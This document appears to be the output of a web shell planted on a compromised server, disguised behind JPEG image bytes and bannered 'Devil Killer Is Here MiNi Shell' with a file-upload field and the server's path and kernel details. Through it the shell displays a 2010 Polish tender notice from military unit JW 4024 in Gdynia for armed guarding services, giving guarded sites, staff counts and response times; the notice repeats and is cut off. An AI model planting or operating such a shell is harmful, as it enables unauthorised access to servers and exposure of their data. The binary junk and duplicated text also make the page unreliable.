JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100422/93313-N-2010.html

<p class="kh_header"><b>Gdynia: WYKONANIE USŁUG W ZAKRESIE OCHRONY OSÓB I MIENIA ŚWIADCZONE PRZEZ SPECJALISTYCZNE UZBROJONE FORMACJE OCHRONNE (SUFO) sprawa 124/JW4024/2010</b><br>
<b>Numer ogłoszenia: 93313 - 2010; data zamieszczenia: 22.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4024 , ul. Strażacka 2-8, 81-912 Gdynia, woj. pomorskie, tel. 058 6265076, faks 058 6265076.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.republika.pl/mwmps</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE USŁUG W ZAKRESIE OCHRONY OSÓB I MIENIA ŚWIADCZONE PRZEZ SPECJALISTYCZNE UZBROJONE FORMACJE OCHRONNE (SUFO) sprawa 124/JW4024/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonywanie usług w zakresie ochrony osób i mienia świadczone przez specjalistyczne uzbrojone formacje ochronne (SUFO) na rzecz Jednostki Wojskowej 4024 :
       - kompleks 4108 Witomino przy ul. Strażackiej 2-8 - obiekt I - 4 pracowników
       - kompleks 4039 Redłowo przy ul. Orląt Lwowskich 20 - obiekt II - 4 pracowników
       - kompleks 4039 przy ul. Redłowskiej 1 - obiekt III - 1 pracownik
       - kompleks 4089 przy ul. Pułaskiego 7 - obiekt IV - 1 pracownik 
Ze względu na specyfikację przedmiotu zamówienia zamawiający nie dopuszcza by w realizacji zamówienia wykonawca powierzył jakąkolwiek czynność podwykonawcom.
I.  Zakres przedmiotu 
1.Zakres i przedmiot działania SUFO zawarto w rozporządzeniu MON z dnia 19 czerwca 1999r. w sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne terenów komórek i jednostek organizacyjnych resortu obrony narodowej (Dz. U. Nr 60, poz. 647 z późń. zm.).
2.W zakres ochrony wchodzi całodobowa ochrona osób i mienia na rzecz Jednostki Wojskowej  Nr 4024 (JW 4024) zgodnie z poniższym tabelarycznym zestawieniem. 
3.Realizacja zadań ochrony polegająca na bezpośredniej ochronie fizycznej oraz utrzymaniu do działania Grupy Interwencyjnej w przypadku powstania zagrożenia obiektu realizowana przez umundurowanych, licencjonowanych pracowników ochrony fizycznej Specjalistycznej Uzbrojonej Formacji  Ochronnej (SUFO).
4.Ochrona obiektu, realizowana będzie zgodnie z Instrukcją Ochrony oraz wyciągiem z Planu Ochrony jednostki.
5.Wykonywana usługa musi odpowiadać wymaganiom określonym  w oparciu o  System Zarządzania Jakością  zgodnym z wymogami normy ISO 9001-2000 w zakresie przedmiotu zamówienia. Dopuszcza się również możliwość realizacji zadań według  równorzędnego zaświadczenia  tj. AQAP.
6.Zamawiający zastrzega możliwość przeniesienia jednego z posterunków zewnętrznych lub wykorzystania jednego    z pracowników ochrony nie pełniącego aktualnie służby na posterunku zewnętrznym ( w czasie osiągania WSGB lub ćwiczeń) obiektu I do realizacji zadań ochronnych Stanowiska Dowodzenia w kompleksie 4108. Szczegółowy zakres zostanie określony w Instrukcji Ochrony oraz każdorazowo pisemnie ze stroną Wykonawcy. 
  7. Konieczność współdziałania pracowników ochrony w przypadku powstania zagrożenia obiektu ze sobą oraz ze służbą    realizującą zadania ochronne na terenie poszczególnych kompleksów oraz z Grupą Interwencyjnej na wezwanie.
8.Grupa Interwencyjna Wykonawcy - minimum dwu osobowa, wyposażona w środek transportu, pracownicy ochrony uzbrojeni w broń krótką, pozostająca w całodobowej dyspozycji z zadaniem reagowania na sytuacje zagrożenia w poszczególnych obiektach z dodatkowym zadaniem sprawdzeń toku pełnienia służby pracowników ochrony i zabezpieczenia w obiektach III i IV ( minimum jeden raz w nocy). Czas przybycia do zagrożonego miejsca do 20 min. Grupa Interwencyjna przewidziana do reakcji we wszystkich obiektach (I-IV). 
 II.  Ogólny zakres działania Wykonawcy związany z realizacja umowy i obowiązki stron:
1.Zapewnienie pełnej, całodobowej obsady kadrowej posterunków w obiektach chronionych (przy obliczaniu ilości osób należy uwzględnić dane zawarte w tabeli powyżej, zmianowość na posterunkach ze względu na fakt występowania posterunków zewnętrznych, jak również mieć na uwadze nagłe okoliczności, nie dające się przewidzieć, wymagające zmiany pracownika w trakcie trwania służby np. zasłabnięcie, nagła choroba). Sposób naliczenia niezbędnej ilości pracowników ochrony do realizacji przedmiotu zamówienia określa (Instrukcja o ochronie obiektów wojskowych) - OIN 3/2008, § 105.3 
2.Staranne wykonywanie czynności związanych ze świadczeniem usług ochrony oraz wykonywaniem czynności kontrolnych i inspekcyjnych. 
3.Zabezpieczenie i ochronę poszczególnych obiektów przed przedostaniem się na ich teren osób nieupoważnionych, nietrzeźwych lub w sposób widoczny mogących stanowić zagrożenie dla JW 4024.
4.Działania mające na celu zapewnienie bezpieczeństwa życia, zdrowia i nietykalności osobistej pracowników Zamawiającego i innych osób znajdujących się na terenie obiektów.
5.Działania zapobiegające przestępstwom i wykroczeniom przeciwko mieniu, w szczególności przeciwko kradzieżom, włamaniom i innym formom wprowadzenia mienia poza strefę kontrolowaną, przeciwdziałanie powstaniu szkody wynikającej z tych zdarzeń. 
6.Kontrolę dokumentów uprawniających do przebywania na terenie poszczególnych obiektów.
7.Ścisłe przestrzeganie aktualnie obowiązujących decyzji i poleceń, dotyczących funkcjonowania systemu przepustkowego oraz doraźnych ustaleń w tym zakresie.
8.Kontrolę pojazdów wjeżdżających i wyjeżdżających na chroniony teren oraz sprawdzanie dokumentów magazynowych, składników majątkowych wwożonych i wywożonych    z poszczególnych obiektów, zgodnie z trybem i zasadami określonymi w Planie Ochrony, Instrukcją Ochrony.
9.Sprawdzanie po godzinach pracy stanu zabezpieczenia obiektów. 
10.Ochronę obiektu, przed bezprawnym filmowaniem, fotografowaniem, szkicowaniem oraz ewentualnymi aktami sabotażu i terroryzmu;
11.Zabezpieczenie i ochronę kompleksów przed działaniem na jego terenie osób zakłócających ład i porządek publiczny.
12.Zabezpieczenie i ochronę składników majątkowych znajdujących się na terenie obiektów przed kradzieżą rabunkiem zniszczeniem lub uszkodzeniem oraz ujawnianie faktów dewastacji.
13.Reagowanie i natychmiastowe zgłaszanie osobom pełniącym służbę w poszczególnych obiektach wszelkich zauważonych zagrożeń dla mienia oraz zdrowia lub życia osób, przebywających na terenach chronionych.
14.Niezwłoczne powiadamianie bezpośrednich przełożonych, osób pełniących służbę dyżurną  w poszczególnych obiektach o przestępstwach i nadzwyczajnych wydarzeniach zaistniałych na terenie kompleksu oraz podejmowanie niezbędnych czynności, celem zabezpieczenia śladów   i dowodów przestępstwa.
15.Ścisłe współdziałanie w zakresie zapewnienia bezpieczeństwa i ochrony obiektu z Żandarmerią Wojskową, najbliższą jednostką Policji.
16.Kontrola przestrzegania przez pracowników ochrony i innych osób przebywających na terenie chronionego obiektu obowiązujących przepisów porządkowych, ochronnych, przeciwpożarowych oraz ustawy o wychowaniu w trzeźwości.
17.Prowadzenie stałego szkolenia wszystkich pracowników ochrony oraz organizowania ćwiczeń w strzelaniu z broni, będącej na ich wyposażeniu, co najmniej raz na dwa miesiące  i przedstawianie udokumentowania tego faktu. Zasady uzbrojenia i warunki przechowywania i ewidencjonowania broni i amunicji zgodnie z Rozporządzeniem MSWiA z dnia 6 sierpnia 1998r. w sprawie zasad uzbrojenia SUFO i warunków przechowywania i ewidencjonowania broni i amunicji ( Dz. U. z dnia 31.08.1998r) 
18.Udział w kwartalnych szkoleniach z pozorowanym naruszeniem systemu ochrony z całym stanem osobowym jednostki po pisemnych ustaleniach w tym zakresie. 
19.Wykonywanie innych zadań związanych z zapewnieniem na terenie kompleksu bezpieczeństwa, porządku i ochrony mienia zleconych przez upoważnione osoby;
20.Wykonywanie doraźnych poleceń koordynacyjnych Dowódcy JW 4024, Pełnomocnika Ochrony oraz Komendanta Ochrony dotyczących przedmiotu zamówienia;
21.Wykonawca zobowiązuje się do zapewnienia wsparcia przez GRUPĘ INTERWENCYJNĄ  z rygorem czasowym max. 20 minut od chwili ich wezwania przez pracowników Wykonawcy ochraniających poszczególne obiekty. Zamawiający zastrzega sobie możliwość dokonania sprawdzenia czasu stawiennictwa Grupy Interwencyjnej maksymalnie dwa razy w miesiącu ( bez ponoszenia dodatkowych kosztów). 
22.Wykonawca zapewni przeszkolenie pracowników z zasadami posługiwania się technicznymi środkami łączności oraz innym wyposażeniem wykorzystywanym do ochrony poszczególnych obiektów.
23.Zamawiający zapewni przeszkolenie z zakresu posługiwania się technicznymi systemami wspomagającymi ochronę zamontowanymi w poszczególnych obiektach (system SWiN, SKD  i  system TV dozoru) - w terminie określonym w innym trybie. 
24.Wykonawca w sytuacji wprowadzenia stanu nadzwyczajnego lub sytuacji kryzysowej bierze czynny udział w zabezpieczeniu ewakuacji materiałów niejawnych. 
III.   Zagadnienia dotyczące zasad ochrony obiektów 
1.W Instrukcji Ochrony zostaną uszczegółowione zasady ochrony obiektów (trasy patrolowania, procedury postępowania w sytuacjach kryzysowych i nadzwyczajnych, współpraca z wojskowymi służbami ochronnymi, Policją, Żandarmerią Wojskową, zestawienia sił i środków użytych do wykonywania umowy itp.).
2.Instrukcję ochrony wykonuje Wykonawca zgodnie z Rozporządzeniem Ministra Obrony Narodowej z dnia 19 czerwca 1999r. w sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne terenów komórek i jednostek organizacyjnych resortu obrony narodowej (Dz. U. Nr 60, poz. 647 z późń. zm.) na podstawie § 6 ust. 4. Do opracowania tego dokumentu wykorzysta materiały otrzymane od Zamawiającego oraz informacje pochodzące ze spotkań roboczych z Zamawiającym. 
3.Zamawiający dostarczy wykaz osób upoważnionych do otwierania pomieszczeń podlegających ochronie oraz niezbędne informacje dla Wykonawcy celem wykonania Instrukcji Ochrony.
4.Po podpisaniu umowy jednakże nie później niż na 2 tygodnie przed rozpoczęciem realizacji umowy Wykonawca przedstawi do zatwierdzenia Zamawiającemu Instrukcję Ochrony.
IV.   Sposób kontrolowania 
1.Wykonawca zobowiązany jest do kontroli osób wchodzących (wychodzących) oraz pojazdów wjeżdżających (wyjeżdżających) na teren i z terenu obiektu na podstawie obowiązującego systemu przepustkowego w jednostkach Marynarki Wojennej . 
2.Uprawnienia Wykonawcy do kontroli dokumentów uprawniających do wstępu, wjazdu  i przebywania na terenie ochranianych obiektów, wnoszenia, wwożenia, wynoszenia lub wywożenia mienia oraz nielegalnego wejścia osób postronnych na tereny i obiekty kompleksu Redłowo  (JW 4024) określone zostaną w Instrukcji Ochrony.
3.Zamawiający udostępni i przekaże protokolarnie Wykonawcy:
- Stacjonarną łączność przewodową i środki łączności bezprzewodowej do powiadamiania i alarmowania oficera dyżurnego jednostki   wojskowej (osoby odpowiedzialnej za ochronę obiektu ) o zaistniałych zdarzeniach (do użytku lokalnego);
- Niezbędne oświetlenie i zabezpieczenie przeciwpożarowe obiektów;
- Pomieszczenia na potrzeby wykonywania zadań ochronnych i pomieszczenia socjalne dla   pracowników ochrony; 
- Wyciągi  z Planu ochrony poszczególnych obiektów zgodnie z rozporządzeniem Ministra Obrony Narodowej z dnia  19 czerwca 1999 r. w sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne  terenów komórek i jednostek organizacyjnych resortu obrony narodowej (Dz. U. Nr 60, poz. 647  z późń. zm.).
4.Zamawiający umożliwia pracownikom ochrony korzystanie z systemu zabezpieczenia medycznego w JW. 4024.
V.  Zobowiązania Wykonawcy i Zamawiającego.
1.Zamawiający wymaga, aby Wykonawca zagwarantował stały skład osobowego zespołu pracowników realizujących w imieniu Wykonawcy przedmiot zamówienia. Zamawiający zastrzega sobie prawo zgłaszania wniosków oraz opiniowania zasadności dokonywania zmian w składzie zespołu realizującego przedmiot zamówienia.
2.Wykonawca zobowiązany jest przekazać Pełnomocnikowi  Ochrony Zamawiającego potwierdzone kserokopie: licencji ochrony fizycznej osób i mienia, poświadczeń bezpieczeństwa i zaświadczeń o przeszkoleniu w zakresie ochrony informacji niejawnych wszystkich pracowników realizujących w imieniu Wykonawcy przedmiot zamówienia. 
3.Wykonawca zobowiązuje się przekazać Zamawiającemu pełny wykaz pracowników ochrony z wyszczególnieniem:
   a) pełnionej funkcji
   b) stopnia i numeru licencji pracownika ochrony fizycznej
 c) klauzuli i numeru Poświadczenia bezpieczeństwa osobowego oraz numeru zaświadczenia o przeszkoleniu w zakresie   OIN
4.Wykonawca zobowiązuje się przedłużyć ważność lub uzyskać nowe dokumenty (certyfikaty, zaświadczenia, poświadczenia, koncesje, polisy itp.) potwierdzające zdolność wykonania przedmiotu umowy, w przypadku gdy ich termin ważności upłynie w trakcie trwania umowy. Kserokopie w/w dokumentów zostaną przekazane niezwłocznie Zamawiającemu po przedłużeniu ich ważności lub otrzymaniu nowych.
5.Wykonawca zobowiązuje się z wyprzedzeniem co najmniej 7-dniowym uzgadniać z Zamawiającym wszelkie zmiany osobowe, jakie nastąpią w trakcie trwania niniejszej umowy i uaktualniać wykaz pracowników realizujących przedmiot umowy. 
6.Wykonawca wyraża zgodę na realizację usług ochronnych po ogłoszeniu mobilizacji, wprowadzeniu stanu wojennego lub w czasie wojny na zasadach i w trybie określonym  w Rozporządzeniu Rady Ministrów z dnia 21.05.2002 roku w sprawie militaryzacji jednostek organizacyjnych wykonujących zadania na rzecz obronności lub bezpieczeństwa Państwa ( Dz. U. nr 78 poz. 707), Rozporządzeniu Ministra Obrony Narodowej z dnia 19.06.1999 roku w sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne terenów , komórek i jednostek organizacyjnych Resortu Obrony Narodowej (Dz. U. nr 60, poz. 647 zm. Dz. U. z 2006 r., nr 19 poz. 148) oraz rozporządzeniu Ministra Obrony Narodowej z dnia 2.06.1999 roku w sprawie wewnętrznych służb ochrony działających na terenach komórek i jednostek organizacyjnych Resortu Obrony Narodowej (dz. U. nr 58 poz. 619 zm. Dz. U. z 2006 roku nr 19 poz. 147).
 Zamawiający przewiduje po wprowadzeniu stanu wojennego lub w czasie wojny w trybie szczegółowo uzgodnionym z Wykonawcą  przekazanie ochrony obiektów I i II  warcie wojskowej Zamawiającego.
7.  Pracownicy ochrony fizycznej przewidziani do ochrony obiektów wojskowych nie mogą posiadać statusu osób   niepełnosprawnych i muszą posiadać kwalifikacje do wykonania przedmiotu umowy oraz dodatkowo:
1) licencję pracownika ochrony fizycznej
a) II stopnia
- osoba koordynująca pracę pracowników ochrony na posterunkach zewnętrznych w Obiekcie I 
-  osoby pełniące służbę w pomieszczeniu biura przepustek w Obiekcie II 
-   koordynator ochrony SUFO z ramienia Wykonawcy
  b) I  stopnia  - pozostali pracownicy. 
  2) poświadczenie bezpieczeństwa osobowego, upoważniające do dostępu do informacji niejawnych i tak :
   -  zastrzeżone dla pracowników ochrony, 
   -  poufne  dla koordynatora ochrony SUFO z ramienia Wykonawcy.
8. Wykonawca zobowiązuje się do jednolitego umundurowania pracowników ochrony w następujący sposób:
-  umundurowanie służbowe z oznakami przynależności do SUFO oraz z identyfikatorami  osobowymi;
-  umundurowanie, uzbrojenie i wyposażenie pracowników SUFO musi być zgodne  z  obowiązującymi przepisami;
-  Wykonawca zobowiązuje się wyposażyć pracowników ochrony w broń palną bojową  wraz z    amunicją, niezbędne środki przymusu    bezpośredniego oraz inne wyposażenie konieczne do wykonywania usług z zakresu ochrony,  zgodnie z wymogami zawartymi w powyższej tabeli
9  Wykonawca odpowiada w pełnej wysokości za straty poniesione przez Zamawiającego wynikłe z nienależytego wykonania warunków umowy.
10. Wysokość strat każdorazowo ustalana jest na podstawie protokołu sporządzanego na tę okoliczność i podpisanego przez upoważnionych przedstawicieli stron.
 VI.  Zasady podległości pracowników ochrony:
1.Pracownicy ochrony podlegają bezpośrednio Wykonawcy, który wydaje im polecenia i sprawuje dyscyplinarny nadzór i kierownictwo nad zatrudnionymi przez siebie pracownikami.
2.Pracownicy Wykonawcy pod względem wykonywania obowiązków związanych z ochroną obiektów, terenów i urządzeń na terenie kompleksu podlegają bezpośrednio:
-  Wykonawcy;
- Dowódcy zmiany (w stosunku do pracownikach pełniących służbę na posterunkach obchodowych  obiektu I  oraz    pracownikowi biura przepustek w odniesieniu do pracowników  posterunków obchodowych w obiekcie II);
3.Oficerowi dyżurnemu oddziału, jego pomocnikowi (w stosunku do wszystkich obiektów) i pomocnikowi oficera dyżurnego oddziału w pionie wsparcia,(w stosunku do pracowników obiektu II i III) oraz oficerowi dyżurnemu DMW    i Kierownikowi Sekcji Zabezpieczenia ( w stosunku do pracowników ochrony obiektu IV ). 
 VII.  Ochrona informacji niejawnych.
1.Strony  zobowiązują się do przechowywania niniejszej umowy oraz korespondencji dotyczącej przedmiotu zamówienia , jako dokumentów ograniczonej dostępności i nie rozpowszechniania wiadomości o ich treści, w myśl obowiązujących przepisów - Ustawa z dnia 22.01.1999 r. o ochronie informacji niejawnych Dz. U. Nr 11, poz. 95) oraz zgodnie z Instrukcją Bezpieczeństwa.
2.Wykonawca w zakresie zapewnienia ochrony informacji zobowiązany jest do nie ujawniania informacji o zakresie prac, miejscu wykonywania umowy, uzyskanych informacjach szczególnie dotyczących systemu ochrony poszczególnych obiektów oraz ścisłego przestrzegania przepisów o ochronie informacji niejawnych.
VIII.   Zakres i sposób kontroli wykonywania zadań ochrony terenów, obiektów, urządzeń JW 4024   w poszczególnych obiektach przez pracowników SUFO prowadzany przez przełożonych oraz osoby określone w odrębnych przepisach, posiadające uprawnienia do kontroli stanu ochrony JW 4024:
1.Pełnomocnik Ochrony oraz Komendant Ochrony oraz osoby wymienione w pkt VI  ppkt. 3 mają prawo kontroli pracowników ochrony o każdej porze dnia i nocy. Wszystkie uwagi dotyczące wykonywania usług z zakresu ochrony będą przekazywane Wykonawcy, który będzie zobowiązany do ich natychmiastowego usunięcia. W przypadku rażącego lub powtarzającego się zaniedbywania obowiązków przez Wykonawcę, Zamawiający uprawniony będzie do odstąpienia od umowy;
2.Za zgodą Dowódcy JW 4024 kontrolę może przeprowadzać organ Żandarmerii Wojskowej oraz inne osoby posiadające uprawnienia do kontroli stanu ochrony terenów, obiektów i urządzeń wojskowych. Kontrolę przeprowadza się w obecności Pełnomocnika Ochrony, Komendanta Ochrony JW 4024;
3.Ogólny zakres kontroli:
- Sposób wykonywania obowiązków przez pracowników Wykonawcy wynikający z realizacji niniejszej umowy, Planu   Ochrony,  Instrukcji Ochrony i innych dokumentów normatywnych;
- Stan wyposażenia pomieszczeń przekazanych Wykonawcy;
- Stan dokumentacji oraz sposób jej prowadzenia;
- Trzeźwość pracowników;
- Zasady przechowywania broni i amunicji;
- Wyposażenie pracowników Wykonawcy;
- Sprawność technicznych systemów wspomagających ochronę oraz środków łączności;
4.Kontrole będą dokonywane w miejscu pełnienia służby, w rejonach posterunków (na trasach patrolowania) kontrole dokonuje się w obecności pracownika ochrony koordynującego tok pełnienia pracy.
5.W siedzibie Wykonawcy osoby wymienione w pkt VIII ppkt. 1 i 2  mają prawo do kontroli:
- Przestrzeganie przepisów dotyczących ochrony informacji niejawnych;
- Dokumentację związana z prowadzeniem przez Wykonawcę szkoleń dla pracowników;
- Aktualności poświadczeń bezpieczeństwo osobowego pracowników Wykonawcy realizujących umowę.
6.Szczegółowe uprawnienia osób funkcyjnych jednostki wojskowej oraz służb dyżurnych w stosunku do pracowników zostaną określone w Instrukcji Ochrony.
7.Osobą upoważnioną do współpracy z Wykonawcą w związku z wykonywaniem usług z zakresu ochrony ze strony Zamawiającego jest Pełnomocnik Ochrony oraz Komendant Ochrony JW 4024 lub inna osoba wyznaczona przez Dowódcę JW 4024..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Wykonywanie usług w zakresie ochrony osób i mienia świadczone przez specjalistyczne uzbrojone formacje ochronne (SUFO) na rzecz Jednostki Wojskowej 4024 :
       - kompleks 4108 Witomino przy ul. Strażackiej 2-8 - obiekt I - 4 pracowników
       - kompleks 4039 Redłowo przy ul. Orląt Lwowskich 20 - obiekt II - 4 pracowników
       - kompleks 4039 przy ul. Redłowskiej 1 - obiekt III - 1 pracownik
       - kompleks 4089 przy ul. Pułaskiego 7 - obiekt IV - 1 pracownik 
Ze względu na specyfikację przedmiotu zamówienia zamawiający nie dopuszcza by w realizacji zamówienia wykonawca powierzył jakąkolwiek czynność podwykonawcom.
I.  Zakres przedmiotu 
1.Zakres i przedmiot działania SUFO zawarto w rozporządzeniu MON z dnia 19 czerwca 1999r. w sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne terenów komórek i jednostek organizacyjnych resortu obrony narodowej (Dz. U. Nr 60, poz. 647 z późń. zm.).
2.W zakres ochrony wchodzi całodobowa ochrona osób i mienia na rzecz Jednostki Wojskowej  Nr 4024 (JW 4024) zgodnie z poniższym tabelarycznym zestawieniem. 
3.Realizacja zadań ochrony polegająca na bezpośredniej ochronie fizycznej oraz utrzymaniu do działania Grupy Interwencyjnej w przypadku powstania zagrożenia obiektu realizowana przez umundurowanych, licencjonowanych pracowników ochrony fizycznej Specjalistycznej Uzbrojonej Formacji  Ochronnej (SUFO).
4.Ochrona obiektu, realizowana będzie zgodnie z Instrukcją Ochrony oraz wyciągiem z Planu Ochrony jednostki.
5.Wykonywana usługa musi odpowiadać wymaganiom określonym  w oparciu o  System Zarządzania Jakością  zgodnym z wymogami normy ISO 9001-2000 w zakresie przedmiotu zamówienia. Dopuszcza się również możliwość realizacji zadań według  równorzędnego zaświadczenia  tj. AQAP.
6.Zamawiający zastrzega możliwość przeniesienia jednego z posterunków zewnętrznych lub wykorzystania jednego    z pracowników ochrony nie pełniącego aktualnie służby na posterunku zewnętrznym ( w czasie osiągania WSGB lub ćwiczeń) obiektu I do realizacji zadań ochronnych Stanowiska Dowodzenia w kompleksie 4108. Szczegółowy zakres zostanie określony w Instrukcji Ochrony oraz każdorazowo pisemnie ze stroną Wykonawcy. 
  7. Konieczność współdziałania pracowników ochrony w przypadku powstania zagrożenia obiektu ze sobą oraz ze służbą    realizującą zadania ochronne na terenie poszczególnych kompleksów oraz z Grupą Interwencyjnej na wezwanie.
8.Grupa Interwencyjna Wykonawcy - minimum dwu osobowa, wyposażona w środek transportu, pracownicy ochrony uzbrojeni w broń krótką, pozostająca w całodobowej dyspozycji z zadaniem reagowania na sytuacje zagrożenia w poszczególnych obiektach z dodatkowym zadaniem sprawdzeń toku pełnienia służby pracowników ochrony i zabezpieczenia w obiektach III i IV ( minimum jeden raz w nocy). Czas przybycia do zagrożonego miejsca do 20 min. Grupa Interwencyjna przewidziana do reakcji we wszystkich obiektach (I-IV). 
 II.  Ogólny zakres działania Wykonawcy związany z realizacja umowy i obowiązki stron:
